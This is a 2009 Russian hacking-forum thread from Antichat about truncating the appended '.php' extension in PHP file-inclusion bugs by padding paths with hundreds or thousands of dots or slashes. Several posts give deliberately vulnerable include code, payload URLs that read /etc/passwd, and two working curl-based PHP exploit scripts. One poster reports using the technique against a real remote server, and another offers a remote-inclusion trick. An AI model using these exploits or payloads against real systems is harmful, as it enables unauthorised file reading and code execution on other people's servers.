Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
02.03.2009, 04:26
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Блин, сегодня на практике применил эту статью , а так бы забил на тот серв с инклюдом и magic quotes on.
Все работает.
на локалхосте тестировал - Win XP, PHP 5.2.4 и апач 2 (денвер 3)
PHP код:
<?php include($_GET['file'].'.php'); ?>
http://localhost/testinc.php?file=favicon.ico[225 точек ] работает.
а потом на удаленном серваке (Линукс, точная версия и ПО неизвестно мне)
http://www.site/~papka1/papka2/Papka3/papka4/script.phtml?page=../../../../../../../../etc/passwd[4015 точек минимальное значение] работает.
Респект вам всем) |
|
|
04.03.2009, 12:01
|
|
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557
Репутация:
125
|
|
Хост: nginx/0.7.31
максимальная длинна 8176 байт.
Накатал минисплоит:
inc.php, http://some_other_host/inc.php
i_am_file_with_include.php
Код:
<?php
include $_GET["file"] . ".php";
?>
exploit.php
Код:
<?php
$include_file = urlencode($argv[1]);
$host = "localhost";
$url = "i_am_file_with_include.php?file=$include_file";
$overflow = "";
$maxURI = 8176;
$sym = "/";
for($i=1;$i<=$maxURI-strlen($url);$i++) {$overflow .= $sym;}
$ch = curl_init("$host/$url$overflow");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
curl_close($ch);
echo $res;
?>
./php exploit.php inc.php - Работает
./php exploit.php http://some_other_host/inc.php - Не работает
http://localhost/i_am_file_with_include.php?file=http://some_other_host/inc - Работает
Метод пашет, только непонятно почему удаленный инклуд не происходит. |
|
|
|
04.03.2009, 12:04
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
С удаленным инсклудом все проше, там даже обрезать не надо, просто поставь в конце - ?
|
|
|
|
15.05.2009, 03:09
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696
Репутация:
40
|
|
WinXP, PHP 5.2.8, Apache 2.2.11, include_path=.;C:\php5\pear
Работает с < > . + /
Минимальная длина строки (вместе с URL) = 280
---------------
FreeBSD 6.4, PHP 5.2.9, Apache 1.3.37, include_path=.:/usr/local/share/pear
Пробовал с / и /. разных длин - не работает
|
|
|
|
20.05.2009, 20:12
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Ня,с твоим скриптом я не фкурил.Вот,написал свою версию:
ЗЫ: Все скрипты должны назодиться в одной папке.
includer2.php
PHP код:
<?php
function dotted() {
$dot = "";
for ($n = 0; $n < 500; $n++) {
$dot .= chr(46);
url_sender($dot);
}
}
function url_sender($dot) {
$url="http://localhost/exploiter/inc.php?file=gangsta.txt$dot";
$ua = "IE 6.0";
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_USERAGENT,$ua);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
$res = curl_exec($ch);
if(preg_match("|Yes!|",$res,$m)) {
echo "<center>Cool!</center>";
}
else {
echo "<center>Fuck!</center>";
}
curl_close($ch);
}
dotted();
?>
inc.php
PHP код:
<?php
include($_GET['file'].php);
?>
Киньте туда любой файлиг(Я его обозвал gangsta.txt : D).Надеюсь,кому-нибудь пригодится(Знаю-знаю - Веля плохой и многого не понимает 
ЗЫ: Не хватает только счётчиков,какой по счёту символ является *фатальным* ))) |
|
|
|
20.05.2009, 20:25
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Пробовал до шести до 5999 точек выставлять - не помогло(хотел проинклудить файл в папке /etc/hosts).
Система: Windows XP HOME (SP 2 )
Интерпретатор: PHP: 5.2.6 без Сухозиновских заплаток.
Сервер: VertrigoServ v 2.21
|
|
|
|
20.05.2009, 20:35
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
В общем,фигня какая-то.Пробиваю расширение только файлов,которые находятся в папке с бажным скриптом.
ЗЫ: Фаил инклудится уже с 204-ой точки и так по возрастающей )))
Последний раз редактировалось Велемир; 20.05.2009 в 20:41..
|
|
|
|
20.05.2009, 20:39
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 Велемир:
Чушь не говори. Посмотри последние три страницы "Ваши вопросы по уязвимостям" - увидишь в действии, как говорится
|
|
|
|
20.05.2009, 20:46
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Не знаю,о чём ты.Если ты о линке на русайт,то он не читабелен.И с чего ты взял,что мой вариант не работает ? Проверь сам - расширение режется
|
|
|
|
20.05.2009, 21:24
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
так если режеться - то что ты хочешь то? Об этом и тема - что можо так отсекать расширение
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид